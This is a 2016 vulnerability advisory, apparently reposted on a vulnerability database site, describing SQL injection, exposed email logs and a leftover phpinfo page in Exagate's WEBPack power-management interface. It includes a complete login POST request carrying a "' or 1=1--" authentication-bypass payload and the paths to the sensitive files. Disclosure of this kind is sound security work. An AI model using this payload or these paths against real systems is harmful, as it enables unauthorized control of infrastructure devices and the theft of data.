Vulners
Lucene search
Exagate WEBPack Management System - Multiple Vulnerabilities
Document Title:
================
Exagate WEBpack Management System Multiple Vulnerabilities
Author:
========
Halil Dalabasmaz
Release Date:
==============
07 OCT 2016
Product & Service Introduction:
================================
WEBPack is the individual built-in user-friendly and skilled web
interface allowing web-based access to the main units of the SYSGuard
and POWERGuard series. The advanced software enables the users to
design their customized dashboard smoothly for a detailed monitoring
and management of all the power outlet sockets & sensor and volt free
contact ports, as well as relay outputs. User definition and authorization,
remote access and update, detailed reporting and archiving are among the
many features.
Vendor Homepage:
=================
http://www.exagate.com/
Vulnerability Information:
===========================
Exagate company uses WEBPack Management System software on the hardware.
The software is web-based and it is provide control on the hardware. There are
multiple vulnerabilities on that software.
Vulnerability #1: SQL Injection
================================
There is no any filtering or validation mechanisim on "login.php". "username"
and "password" inputs are vulnerable to SQL Injection attacks. Sample POST
request is given below.
POST /login.php HTTP/1.1
Host: <TARGET HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
username=root&password=' or 1=1--
Vulnerability #2: Unauthorized Access To Sensetive Information
===============================================================
The software is capable of sending e-mail to system admins. But there is no
any authorization mechanism to access e-mail logs. The e-mail logs can accessable
anonymously from "http://<TARGET HOST>/emaillog.txt".
Vulnerability #3: Unremoved Configuration Files
================================================
The software contains the PHP Info file on the following URL.
http://<TARGET HOST>/api/phpinfo.php
Vulnerability Disclosure Timeline:
==================================
03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities
06 OCT 2016 - No response from vendor and re-attempted to contact vendor
07 OCT 2016 - No response from vendor
07 OCT 2016 - Public Disclosure
Discovery Status:
==================
Published
Affected Product(s):
=====================
Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities)
Tested On:
===========
Exagate SYSGuard 3001
# 0day.today [2018-03-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Oct 2016 00:00Current
7.1High risk
Vulners AI Score7.1